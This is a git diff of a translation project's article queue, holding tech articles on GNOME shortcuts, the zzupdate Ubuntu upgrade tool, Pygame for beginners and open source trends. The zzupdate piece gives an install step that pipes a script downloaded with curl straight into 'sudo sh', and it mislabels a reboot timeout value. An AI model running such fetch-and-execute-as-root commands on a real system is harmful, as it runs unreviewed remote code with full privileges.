||||
|
||||
To access the list of shortcuts, go to "Settings -> Devices -> Keyboard." Here are some less popular, yet useful shortcuts.
|
||||
|
||||
* Ctrl + Alt + T - this combination launches the terminal; you can use this from anywhere within GNOME
|
||||
|
||||
|
||||
|
||||
Two shortcuts I personally use quite frequently are:
|
||||
|
||||
* Alt + F4 - close the window on focus
|
||||
* Alt + F8 - resize the window
|
||||
|
||||
|
||||
Most of you know how to switch between open applications (Alt + Tab), but you may not know you can use Alt + Shift + Tab to cycle through applications in reverse direction.
|
||||
|
||||
Another useful combination for switching within the windows of an application is Alt + (key above Tab) (example: Alt + ` on a US keyboard).
|
||||
|
||||
If you want to show the Activities overview, use Alt + F1.
|
||||
|
||||
There are quite a lot of shortcuts related to workspaces. If you are like me and don't use multiple workspaces frequently, these shortcuts are useless to you. Still, some of the ones worth noting are the following:
|
||||
|
||||
* Super + PageUp (or PageDown) moves to the workspace above or below
|
||||
* Ctrl + Alt + Left (or Right) moves to the workspace on the left/right
|
||||
|
||||
If you add Shift to these commands, e.g. Shift + Ctrl + Alt + Left, you move the window one worskpace above, below, to the left, or to the right.
|
||||
|
||||
Another favorite keyboard shortcut of mine is in the Accessibility section - Increase/Decrease Text Size. You can use Ctrl + + (and Ctrl + -) to zoom text size quickly. In some cases, this may be disabled by default, so do check it out before you try it.
|
||||
|
||||
The above-mentioned shortcuts are lesser known, yet useful keyboard shortcuts. If you are curious to see what else is available, you can check [the official GNOME shell cheat sheet][2].
|
||||
|
||||
If the default shortcuts are not to your liking, you can change them or create new ones. You do this from the same "Settings -> Devices -> Keyboard" dialog. Just select the entry you want to change, and the following dialog will popup.
|
||||
|
||||
![gnome-shortcuts-02-change-shortcut][3]
|
||||
|
||||
![gnome-shortcuts-02-change-shortcut][3]
|
||||
|
||||
Enter the keyboard combination you want.
|
||||
|
||||
![gnome-shortcuts-03-set-shortcut][4]
|
||||
|
||||
![gnome-shortcuts-03-set-shortcut][4]
|
||||
|
||||
If it is already in use you will get a message. If not, just click Set, and you are done.
|
||||
|
||||
If you want to add new shortcuts rather than change existing ones, scroll down until you see the "Plus" sign, click it, and in the dialog that appears, enter the name and keys of your new keyboard shortcut.
|
||||
|
||||
![gnome-shortcuts-04-add-custom-shortcut][5]
|
||||
|
||||
![gnome-shortcuts-04-add-custom-shortcut][5]
|
||||
|
||||
GNOME doesn't come with tons of shell shortcuts by default, and the above listed ones are some of the more useful ones. If these shortcuts are not enough for you, you can always create your own. Let us know if this is helpful to you.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/gnome-shell-keyboard-shortcuts/
|
||||
|
||||
作者:[Ada Ivanova][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com/author/adaivanoff/
|
||||
[1]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-01-settings.jpg (gnome-shortcuts-01-settings)
|
||||
[2]https://wiki.gnome.org/Projects/GnomeShell/CheatSheet
|
||||
[3]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-02-change-shortcut.png (gnome-shortcuts-02-change-shortcut)
|
||||
[4]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-03-set-shortcut.png (gnome-shortcuts-03-set-shortcut)
|
||||
[5]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-04-add-custom-shortcut.png (gnome-shortcuts-04-add-custom-shortcut)
|
@ -0,0 +1,111 @@
|
||||
translating---geekpi
|
||||
|
||||
Easily Upgrade Ubuntu to a Newer Version with This Single Command
|
||||
======
|
||||
[zzupdate][1] is an open source command line utility that makes the task of upgrading Ubuntu Desktop and Server to newer versions a tad bit easier by combining several update commands into one single command.
|
||||
|
||||
Upgrading an Ubuntu system to a newer release is not a herculean task. Either with the GUI or with a couple of commands, you can easily upgrade your system to the latest release.
|
||||
|
||||
On the other hand, zzupdate written by Gianluigi 'Zane' Zanettini handles clean, update, autoremove, version upgrade and composer self-update for your Ubuntu system with just a single command.
|
||||
|
||||
It cleans up the local cache, updates available package information, and then perform a distribution upgrade. In the next step, it updates the Composer and removes the unused packages.
|
||||
|
||||
The script must run as root user.
|
||||
|
||||
### Installing zzupdate to upgrade Ubuntu to a newer version
|
||||
|
||||
![Upgrade Ubuntu to a newer version with a single command][2]
|
||||
|
||||
![Upgrade Ubuntu to a newer version with a single command][3]
|
||||
|
||||
To install zzupdate, execute the below command in a Terminal.
|
||||
```
|
||||
curl -s https://raw.githubusercontent.com/TurboLabIt/zzupdate/master/setup.sh | sudo sh
|
||||
```
|
||||
|
||||
And then copy the provided sample configuration file to zzupdate.conf and set your preferences.
|
||||
```
|
||||
sudo cp /usr/local/turbolab.it/zzupdate/zzupdate.default.conf /etc/turbolab.it/zzupdate.conf
|
||||
```
|
||||
|
||||
Once you have everything, just use the following command and it will start upgrading your Ubuntu system to a newer version (if there is any).
|
||||
|
||||
`sudo zzupdate`
|
||||
|
||||
Note that zzupdate upgrades the system to the next available version in case of a normal release. However, when you are running Ubuntu 16.04 LTS, it tries to search for the next long-term support version only and not the latest version available.
|
||||
|
||||
If you want to move out of the LTS release and upgrade to the latest release, you will have change some options.
|
||||
|
||||
For Ubuntu desktop, open **Software & Updates** and under **Updates** tab and change Notify me of a new Ubuntu version to " **For any new version** ".
|
||||
|
||||
![Software Updater in Ubuntu][2]
|
||||
|
||||
![Software Updater in Ubuntu][4]
|
||||
|
||||
For Ubuntu server, edit the release-upgrades file.
|
||||
```
|
||||
vi /etc/update-manager/release-upgrades
|
||||
|
||||
Prompt=normal
|
||||
```
|
||||
|
||||
### Configuring zzupdate [optional]
|
||||
|
||||
zzupdate options to configure
|
||||
```
|
||||
REBOOT=1
|
||||
```
|
||||
|
||||
If this value is 1, a system restart is performed after an upgrade.
|
||||
```
|
||||
REBOOT_TIMEOUT=15
|
||||
```
|
||||
|
||||
This sets up the reboot timeout to 900 seconds as some hardware takes much longer to reboot than others.
|
||||
```
|
||||
VERSION_UPGRADE=1
|
||||
```
|
||||
|
||||
Executes version progression if an upgrade is available.
|
||||
```
|
||||
VERSION_UPGRADE_SILENT=0
|
||||
```
|
||||
|
||||
Version progression occurs automatically.
|
||||
```
|
||||
COMPOSER_UPGRADE=1
|
||||
```
|
||||
|
||||
Value '1' will automatically upgrade the composer.
|
||||
```
|
||||
SWITCH_PROMPT_TO_NORMAL=0
|
||||
```
|
||||
|
||||
This features switches the Ubuntu Version updated to normal i.e. if you have an LTS release running, zzupdate won't upgrade it to Ubuntu 17.10 if its set to 0. It will search for an LTS version only. In contrast, value 1 searches for the latest release whether you are running an LTS or a normal release.
|
||||
|
||||
Once done, all you have to do is run in console to run a complete update of your Ubuntu system
|
||||
```
|
||||
sudo zzupdate
|
||||
```
|
||||
|
||||
### Final Words
|
||||
|
||||
Though the upgrade process for Ubuntu is in itself an easy one, zzupdate reduces it to mere one command. No coding knowledge is necessary and the process is complete config file driven. I personally found itself a good tool to update several Ubuntu systems without the need of taking care of different things separately.
|
||||
|
||||
Are you willing to give it a try?
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/zzupdate-upgrade-ubuntu/
|
||||
|
||||
作者:[Ambarish Kumar;Abhishek Prakash][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com
|
||||
[1]:https://github.com/TurboLabIt/zzupdate
|
||||
[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[3]:https://itsfoss.com/wp-content/uploads/2017/11/upgrade-ubuntu-single-command-featured-800x450.jpg
|
||||
[4]:https://itsfoss.com/wp-content/uploads/2017/11/software-update-any-new-version-800x378.jpeg
|
@ -1,143 +0,0 @@
|
||||
(translating by runningwater)
|
||||
Why Python and Pygame are a great pair for beginning programmers
|
||||
============================================================
|
||||
|
||||
### We look at three reasons Pygame is a good choice for learning to program.
|
||||
|
||||
|
||||
![What's the best game platform for beginning programmers?](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/code_development_programming.png?itok=M_QDcgz5 "What's the best game platform for beginning programmers?")
|
||||
Image by :
|
||||
|
||||
opensource.com
|
||||
|
||||
Last month, [Scott Nesbitt][10] wrote about [Mozilla awarding $500K to support open source projects][11]. Phaser, a HTML/JavaScript game platform, was [awarded $50,000][12]. I’ve been teaching Phaser to my pre-teen daughter for a year, and it's one of the best and easiest HTML game development platforms to learn. [Pygame][13], however, may be a better choice for beginners. Here's why.
|
||||
|
||||
### 1\. One long block of code
|
||||
|
||||
Pygame is based on Python, the [most popular language for introductory computer courses][14]. Python is great for writing out ideas in one long block of code. Kids start off with a single file and with a single block of code. Before they can get to functions or classes, they start with code that will soon resemble spaghetti. It’s like finger-painting, as they throw thoughts onto the page.
|
||||
|
||||
More Python Resources
|
||||
|
||||
* [What is Python?][1]
|
||||
|
||||
* [Top Python IDEs][2]
|
||||
|
||||
* [Top Python GUI frameworks][3]
|
||||
|
||||
* [Latest Python content][4]
|
||||
|
||||
* [More developer resources][5]
|
||||
|
||||
This approach to learning works. Kids will naturally start to break things into functions and classes as their code gets more difficult to manage. By learning the syntax of a language like Python prior to learning about functions, the student will gain basic programming knowledge before using global and local scope.
|
||||
|
||||
Most HTML games separate the structure, style, and programming logic into HTML, CSS, and JavaScript to some degree and require knowledge of CSS and HTML. While the separation is better in the long term, it can be a barrier for beginners. Once kids realize that they can quickly build web pages with HTML and CSS, they may get distracted by the visual excitement of colors, fonts, and graphics. Even those who stay focused on JavaScript coding will still need to learn the basic document structure that the JavaScript code sits in.
|
||||
|
||||
### 2\. Global variables are more obvious
|
||||
|
||||
Both Python and JavaScript use dynamically typed variables, meaning that a variable becomes a string, an integer, or float when it’s assigned; however, making mistakes is easier in JavaScript. Similar to typed variables, both JavaScript and Python have global and local variable scopes. In Python, global variables inside of a function are identified with the global keyword.
|
||||
|
||||
Let’s look at the basic [Making your first Phaser game tutorial][15], by Alvin Ourrad and Richard Davey, to understand the challenge of using Phaser to teach programming to beginners. In JavaScript, global variables—variables that can be accessed anywhere in the program—are difficult to keep track of and often are the source of bugs that are challenging to solve. Richard and Alvin are expert programmers and use global variables intentionally to keep things concise.
|
||||
|
||||
```
|
||||
var game = new Phaser.Game(800, 600, Phaser.AUTO, '', { preload: preload, create: create, update: update });
|
||||
|
||||
function preload() {
|
||||
|
||||
game.load.image('sky', 'assets/sky.png');
|
||||
|
||||
}
|
||||
|
||||
var player;
|
||||
var platforms;
|
||||
|
||||
function create() {
|
||||
game.physics.startSystem(Phaser.Physics.ARCADE);
|
||||
…
|
||||
```
|
||||
|
||||
In their Phaser programming book [_Interphase_ ,][16] Richard Davey and Ilija Melentijevic explain that global variables are commonly used in many Phaser projects because they make it easier to get things done quickly.
|
||||
|
||||
> “If you’ve ever worked on a game of any significant size then this approach is probably already making you cringe slightly... So why do we do it? The reason is simply because it’s the most concise and least complicated way to demonstrate what Phaser can do.”
|
||||
|
||||
Although structuring a Phaser application to use local variables and split things up nicely into separation of concerns is possible, that’s tough for kids to understand when they’re first learning to program.
|
||||
|
||||
If you’re set on teaching your kids to code with JavaScript, or if they already know how to code in another language like Python, a good Phaser course is [The Complete Mobile Game Development Course][17], by [Pablo Farias Navarro][18]. Although the title focuses on mobile games, the actual course focuses on JavaScript and Phaser. The JavaScript and Phaser apps are moved to a mobile phone with [PhoneGap][19].
|
||||
|
||||
### 3\. Pygame comes with less assembly required
|
||||
|
||||
Thanks to [Python Wheels][20], Pygame is now super [easy to install][21]. You can also install it on Fedora/Red Hat with the **yum** package manager:
|
||||
|
||||
```
|
||||
sudo yum install python3-pygame
|
||||
```
|
||||
|
||||
See the official [Pygame installation documentation][22] for more information.
|
||||
|
||||
Although Phaser itself is even easier to install, it does require more knowledge to use. As mentioned previously, the student will need to assemble their JavaScript code within an HTML document with some CSS. In addition to the three languages—HTML, CSS, and JavaScript—Phaser also requires the use of Firefox or Chrome development tools and an editor. The most common editors for JavaScript are Sublime, Atom, VS Code (probably in that order).
|
||||
|
||||
Phaser applications will not run if you open the HTML file in a browser directly, due to [same-origin policy][23]. You must run a web server and access the files by connecting to the web server. Fortunately, you don’t need to run Apache on your local computer; you can run something lightweight like [httpster][24] for most projects.
|
||||
|
||||
### Advantages of Phaser and JavaScript
|
||||
|
||||
With all the challenges of JavaScript and Phaser, why am I teaching them? Honestly, I held off for a long time. I worried about students learning variable hoisting and scope. I developed my own curriculum based on Pygame and Python, then I developed one based on Phaser. Eventually, I decided to use Pablo’s pre-made curriculum as a starting point.
|
||||
|
||||
There are really two reasons that I moved to JavaScript. First, JavaScript has emerged as a serious language used in serious applications. In addition to web applications, it’s used for mobile and server applications. JavaScript is everywhere, and it’s used widely in applications kids see every day. If their friends code in JavaScript, they'll likely want to as well. As I saw the momentum behind JavaScript, I looked into alternatives that could compile into JavaScript, primarily Dart and TypeScript. I didn’t mind the extra conversion step, but I still looked at JavaScript.
|
||||
|
||||
In the end, I chose to use Phaser and JavaScript because I realized that the problems could be solved with JavaScript and a bit of work. High-quality debugging tools and the work of some exceptionally smart people have made JavaScript a language that is both accessible and useful for teaching kids to code.
|
||||
|
||||
### Final word: Python vs. JavaScript
|
||||
|
||||
When people ask me what language to start their kids with, I immediately suggest Python and Pygame. There are tons of great curriculum options, many of which are free. I used ["Making Games with Python & Pygame"][25] by Al Sweigart with my son. I also used _[Think Python: How to Think Like a Computer Scientist][7]_ by Allen B. Downey. You can get Pygame on your Android phone with [RAPT Pygame][26] by [Tom Rothamel][27].
|
||||
|
||||
Despite my recommendation, I always suspect that kids soon move to JavaScript. And that’s okay—JavaScript is a mature language with great tools. They’ll have fun with JavaScript and learn a lot. But after years of helping my daughter’s older brother create cool games in Python, I’ll always have an emotional attachment to Python and Pygame.
|
||||
|
||||
### About the author
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/craig-head-crop.png?itok=LlMnIq8m)][28]
|
||||
|
||||
Craig Oda - First elected president and co-founder of Tokyo Linux Users Group. Co-author of "Linux Japanese Environment" book published by O'Reilly Japan. Part of core team that established first ISP in Asia. Former VP of product management and product marketing for major Linux company. Partner at Oppkey, developer relations consulting firm in Silicon Valley.[More about me][8]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/11/pygame
|
||||
|
||||
作者:[Craig Oda ][a]
|
||||
译者:[runningwater](https://github.com/runningwater)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/codetricity
|
||||
[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ
|
||||
[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ
|
||||
[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ
|
||||
[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ
|
||||
[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ
|
||||
[6]:https://opensource.com/article/17/11/pygame?rate=PV7Af00S0QwicZT2iv8xSjJrmJPdpfK1Kcm7LXxl_Xc
|
||||
[7]:http://greenteapress.com/thinkpython/html/index.html
|
||||
[8]:https://opensource.com/users/codetricity
|
||||
[9]:https://opensource.com/user/46031/feed
|
||||
[10]:https://opensource.com/users/scottnesbitt
|
||||
[11]:https://opensource.com/article/17/10/news-october-14
|
||||
[12]:https://www.patreon.com/photonstorm/posts
|
||||
[13]:https://www.pygame.org/news
|
||||
[14]:https://cacm.acm.org/blogs/blog-cacm/176450-python-is-now-the-most-popular-introductory-teaching-language-at-top-u-s-universities/fulltext
|
||||
[15]:http://phaser.io/tutorials/making-your-first-phaser-game
|
||||
[16]:https://phaser.io/interphase
|
||||
[17]:https://academy.zenva.com/product/the-complete-mobile-game-development-course-platinum-edition/
|
||||
[18]:https://gamedevacademy.org/author/fariazz/
|
||||
[19]:https://phonegap.com/
|
||||
[20]:https://pythonwheels.com/
|
||||
[21]:https://pypi.python.org/pypi/Pygame
|
||||
[22]:http://www.pygame.org/wiki/GettingStarted#Pygame%20Installation
|
||||
[23]:https://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
|
||||
[24]:https://simbco.github.io/httpster/
|
||||
[25]:https://inventwithpython.com/makinggames.pdf
|
||||
[26]:https://github.com/renpytom/rapt-pygame-example
|
||||
[27]:https://github.com/renpytom
|
||||
[28]:https://opensource.com/users/codetricity
|
||||
[29]:https://opensource.com/users/codetricity
|
||||
[30]:https://opensource.com/users/codetricity
|
||||
[31]:https://opensource.com/article/17/11/pygame#comments
|
||||
[32]:https://opensource.com/tags/python
|
||||
[33]:https://opensource.com/tags/programming
|
@ -1,143 +0,0 @@
|
||||
translating by wangy325...
|
||||
|
||||
|
||||
10 open source technology trends for 2018
|
||||
============================================================
|
||||
|
||||
### What do you think will be the next open source tech trends? Here are 10 predictions.
|
||||
|
||||
![10 open source technology trends for 2018](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018")
|
||||
Image by : [Mitch Bennett][10]. Modified by Opensource.com. [CC BY-SA 4.0][11]
|
||||
|
||||
Technology is always evolving. New developments, such as OpenStack, Progressive Web Apps, Rust, R, the cognitive cloud, artificial intelligence (AI), the Internet of Things, and more are putting our usual paradigms on the back burner. Here is a rundown of the top open source trends expected to soar in popularity in 2018.
|
||||
|
||||
### 1\. OpenStack gains increasing acceptance
|
||||
|
||||
[OpenStack][12] is essentially a cloud operating system that offers admins the ability to provision and control huge compute, storage, and networking resources through an intuitive and user-friendly dashboard.
|
||||
|
||||
Many enterprises are using the OpenStack platform to build and manage cloud computing systems. Its popularity rests on its flexible ecosystem, transparency, and speed. It supports mission-critical applications with ease and lower costs compared to alternatives. But, OpenStack's complex structure and its dependency on virtualization, servers, and extensive networking resources has inhibited its adoption by a wider range of enterprises. Using OpenStack also requires a well-oiled machinery of skilled staff and resources.
|
||||
|
||||
The OpenStack Foundation is working overtime to fill the voids. Several innovations, either released or on the anvil, would resolve many of its underlying challenges. As complexities decrease, OpenStack will surge in acceptance. The fact that OpenStack is already backed by many big software development and hosting companies, in addition to thousands of individual members, makes it the future of cloud computing.
|
||||
|
||||
### 2\. Progressive Web Apps become popular
|
||||
|
||||
[Progressive Web Apps][13] (PWA), an aggregation of technologies, design concepts, and web APIs, offer an app-like experience in the mobile browser.
|
||||
|
||||
Traditional websites suffer from many inherent shortcomings. Apps, although offering a more personal and focused engagement than websites, place a huge demand on resources, including needing to be downloaded upfront. PWA delivers the best of both worlds. It delivers an app-like experience to users while being accessible on browsers, indexable on search engines, and responsive to fit any form factor. Like an app, a PWA updates itself to always display the latest real-time information, and, like a website, it is delivered in an ultra-safe HTTPS model. It runs in a standard container and is accessible to anyone who types in the URL, without having to install anything.
|
||||
|
||||
PWAs perfectly suit the needs of today's mobile users, who value convenience and personal engagement over everything else. That this technology is set to soar in popularity is a no-brainer.
|
||||
|
||||
### 3\. Rust to rule the roost
|
||||
|
||||
Most programming languages come with safety vs. control tradeoffs. [Rust][14] is an exception. The language co-opts extensive compile-time checking to offer 100% control without compromising safety. The last [Pwn2Own][15] competition threw up many serious vulnerabilities in Firefox on account of its underlying C++ language. If Firefox had been written in Rust, many of those errors would have manifested as compile-time bugs and resolved before the product rollout stage.
|
||||
|
||||
Rust's unique approach of built-in unit testing has led developers to consider it a viable first-choice open source language. It offers an effective alternative to languages such as C and Python to write secure code without sacrificing expressiveness. Rust has bright days ahead in 2018.
|
||||
|
||||
### 4\. R user community grows
|
||||
|
||||
The [R][16] programming language, a GNU project, is associated with statistical computing and graphics. It offers a wide array of statistical and graphical techniques and is extensible to boot. It starts where [S][17] ends. With the S language already the vehicle of choice for research in statistical methodology, R offers a viable open source route for data manipulation, calculation, and graphical display. An added benefit is R's attention to detail and care for the finer nuances.
|
||||
|
||||
Like Rust, R's fortunes are on the rise.
|
||||
|
||||
### 5\. XaaS expands in scope
|
||||
|
||||
XaaS, an acronym for "anything as a service," stands for the increasing number of services delivered over the internet, rather than on premises. Although software as a service (SaaS), infrastructure as a service (IaaS), and platform as a service (PaaS) are well-entrenched, new cloud-based models, such as network as a service (NaaS), storage as a service (SaaS or StaaS), monitoring as a service (MaaS), and communications as a service (CaaS), are soaring in popularity. A world where anything and everything is available "as a service" is not far away.
|
||||
|
||||
The scope of XaaS now extends to bricks-and-mortar businesses, as well. Good examples are companies such as Uber and Lyft leveraging digital technology to offer transportation as a service and Airbnb offering accommodations as a service.
|
||||
|
||||
High-speed networks and server virtualization that make powerful computing affordable have accelerated the popularity of XaaS, to the point that 2018 may become the "year of XaaS." The unmatched flexibility, agility, and scalability will propel the popularity of XaaS even further.
|
||||
|
||||
### 6\. Containers gain even more acceptance
|
||||
|
||||
Container technology is the approach of packaging pieces of code in a standardized way so they can be "plugged and run" quickly in any environment. Container technology allows enterprises to cut costs and implementation times. While the potential of containers to revolutionize IT infrastructure has been evident for a while, actual container use has remained complex.
|
||||
|
||||
Container technology is still evolving, and the complexities associated with the technology decrease with every advancement. The latest developments make containers quite intuitive and as easy as using a smartphone, not to mention tuned for today's needs, where speed and agility can make or break a business.
|
||||
|
||||
### 7\. Machine learning and artificial intelligence expand in scope
|
||||
|
||||
[Machine learning and AI][18] give machines the ability to learn and improve from experience without a programmer explicitly coding the instruction.
|
||||
|
||||
These technologies are already well entrenched, with several open source technologies leveraging them for cutting-edge services and applications.
|
||||
|
||||
[Gartner predicts][19] the scope of machine learning and artificial intelligence will expand in 2018\. Several greenfield areas, such as data preparation, integration, algorithm selection, training methodology selection, and model creation are all set for big-time enhancements through the infusion of machine learning.
|
||||
|
||||
New open source intelligent solutions are set to change the way people interact with systems and transform the very nature of work.
|
||||
|
||||
* Conversational platforms, such as chatbots, make the question-and-command experience, where a user asks a question and the platform responds, the default medium of interacting with machines.
|
||||
|
||||
* Autonomous vehicles and drones, fancy fads today, are expected to become commonplace by 2018.
|
||||
|
||||
* The scope of immersive experience will expand beyond video games and apply to real-life scenarios such as design, training, and visualization processes.
|
||||
|
||||
### 8\. Blockchain becomes mainstream
|
||||
|
||||
Blockchain has come a long way from Bitcoin. The technology is already in widespread use in finance, secure voting, authenticating academic credentials, and more. In the coming year, healthcare, manufacturing, supply chain logistics, and government services are among the sectors most likely to embrace blockchain technology.
|
||||
|
||||
Blockchain distributes digital information. The information resides on millions of nodes, in shared and reconciled databases. The fact that it's not controlled by any single authority and has no single point of failure makes it very robust, transparent, and incorruptible. It also solves the threat of a middleman manipulating the data. Such inherent strengths account for blockchain's soaring popularity and explain why it is likely to emerge as a mainstream technology in the immediate future.
|
||||
|
||||
### 9\. Cognitive cloud moves to center stage
|
||||
|
||||
Cognitive technologies, such as machine learning and artificial intelligence, are increasingly used to reduce complexity and personalize experiences across multiple sectors. One case in point is gamification apps in the financial sector, which offer investors critical investment insights and reduce the complexities of investment models. Digital trust platforms reduce the identity-verification process for financial institutions by about 80%, improving compliance and reducing chances of fraud.
|
||||
|
||||
Such cognitive cloud technologies are now moving to the cloud, making it even more potent and powerful. IBM Watson is the most well-known example of the cognitive cloud in action. IBM's UIMA architecture was made open source and is maintained by the Apache Foundation. DARPA's DeepDive project mirrors Watson's machine learning abilities to enhance decision-making capabilities over time by learning from human interactions. OpenCog, another open source platform, allows developers and data scientists to develop artificial intelligence apps and programs.
|
||||
|
||||
Considering the high stakes of delivering powerful and customized experiences, these cognitive cloud platforms are set to take center stage over the coming year.
|
||||
|
||||
### 10\. The Internet of Things connects more things
|
||||
|
||||
At its core, the Internet of Things (IoT) is the interconnection of devices through embedded sensors or other computing devices that enable the devices (the "things") to send and receive data. IoT is already predicted to be the next big major disruptor of the tech space, but IoT itself is in a continuous state of flux.
|
||||
|
||||
One innovation likely to gain widespread acceptance within the IoT space is Autonomous Decentralized Peer-to-Peer Telemetry ([ADEPT][20]), which is propelled by IBM and Samsung. It uses a blockchain-type technology to deliver a decentralized network of IoT devices. Freedom from a central control system facilitates autonomous communications between "things" in order to manage software updates, resolve bugs, manage energy, and more.
|
||||
|
||||
### Open source drives innovation
|
||||
|
||||
Digital disruption is the norm in today's tech-centric era. Within the technology space, open source is now pervasive, and in 2018, it will be the driving force behind most of the technology innovations.
|
||||
|
||||
Which open source trends and technologies would you add to this list? Let us know in the comments.
|
||||
|
||||
### Topics
|
||||
|
||||
[Business][25][Yearbook][26][2017 Open Source Yearbook][27]
|
||||
|
||||
### About the author
|
||||
|
||||
[![Sreejith@Fingent](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/sreejith.jpg?itok=sdYNV49V)][21] Sreejith - I have been programming since 2000, and professionally since 2007\. I currently lead the Open Source team at [Fingent][6] as we work on different technology stacks, ranging from the "boring"(read tried and trusted) to the bleeding edge. I like building, tinkering with and breaking things, not necessarily in that order. Hit me up at: [https://www.linkedin.com/in/futuregeek/][7][More about me][8]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/11/10-open-source-technology-trends-2018
|
||||
|
||||
作者:[Sreejith ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/sreejith
|
||||
[1]:https://opensource.com/resources/what-is-openstack?intcmp=7016000000127cYAAQ
|
||||
[2]:https://opensource.com/resources/openstack/tutorials?intcmp=7016000000127cYAAQ
|
||||
[3]:https://opensource.com/tags/openstack?intcmp=7016000000127cYAAQ
|
||||
[4]:https://www.rdoproject.org/?intcmp=7016000000127cYAAQ
|
||||
[5]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018?rate=GJqOXhiWvZh0zZ6WVTUzJ2TDJBpVpFhngfuX9V-dz4I
|
||||
[6]:https://www.fingent.com/
|
||||
[7]:https://www.linkedin.com/in/futuregeek/
|
||||
[8]:https://opensource.com/users/sreejith
|
||||
[9]:https://opensource.com/user/185026/feed
|
||||
[10]:https://www.flickr.com/photos/mitchell3417/9206373620
|
||||
[11]:https://creativecommons.org/licenses/by-sa/4.0/
|
||||
[12]:https://www.openstack.org/
|
||||
[13]:https://developers.google.com/web/progressive-web-apps/
|
||||
[14]:https://www.rust-lang.org/
|
||||
[15]:https://en.wikipedia.org/wiki/Pwn2Own
|
||||
[16]:https://en.wikipedia.org/wiki/R_(programming_language)
|
||||
[17]:https://en.wikipedia.org/wiki/S_(programming_language)
|
||||
[18]:https://opensource.com/tags/artificial-intelligence
|
||||
[19]:https://sdtimes.com/gartners-top-10-technology-trends-2018/
|
||||
[20]:https://insights.samsung.com/2016/03/17/block-chain-mobile-and-the-internet-of-things/
|
||||
[21]:https://opensource.com/users/sreejith
|
||||
[22]:https://opensource.com/users/sreejith
|
||||
[23]:https://opensource.com/users/sreejith
|
||||
[24]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018#comments
|
||||
[25]:https://opensource.com/tags/business
|
||||
[26]:https://opensource.com/tags/yearbook
|
||||
[27]:https://opensource.com/yearbook/2017
|
@ -1,78 +0,0 @@
|
||||
|
||||
Translating by FelixYFZ
|
||||
How to find a publisher for your tech book
|
||||
============================================================
|
||||
|
||||
### Writing a technical book takes more than a good idea. You need to know a bit about how the publishing industry works.
|
||||
|
||||
|
||||
![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book")
|
||||
Image by : opensource.com
|
||||
|
||||
You've got an idea for a technical book—congratulations! Like a hiking the Appalachian trail, or learning to cook a soufflé, writing a book is one of those things that people talk about, but never take beyond the idea stage. That makes sense, because the failure rate is pretty high. Making it real involves putting your idea in front of a publisher, and finding out whether it's good enough to become a book. That step is scary enough, but the lack of information about how to do it complicates matters.
|
||||
|
||||
If you want to work with a traditional publisher, you'll need to get your book in front of them and hopefully start on the path to publication. I'm the Managing Editor at the [Pragmatic Bookshelf][4], so I see proposals all the time, as well as helping authors to craft good ones. Some are good, others are bad, but I often see proposals that just aren't right for Pragmatic. I'll help you with the process of finding the right publisher, and how to get your idea noticed.
|
||||
|
||||
### Identify your target
|
||||
|
||||
Your first step is to figure out which publisher is the a good fit for your idea. To start, think about the publishers that you buy books from, and that you enjoy. The odds are pretty good that your book will appeal to people like you, so starting with your favorites makes for a pretty good short list. If you don't have much of a book collection, you can visit a bookstore, or take a look on Amazon. Make a list of a handful of publishers that you personally like to start with.
|
||||
|
||||
Next, winnow your prospects. Although most technical publishers look alike from a distance, they often have distinctive audiences. Some publishers go for broadly popular topics, such as C++ or Java. Your book on Elixir may not be a good fit for that publisher. If your prospective book is about teaching programming to kids, you probably don't want to go with the traditional academic publisher.
|
||||
|
||||
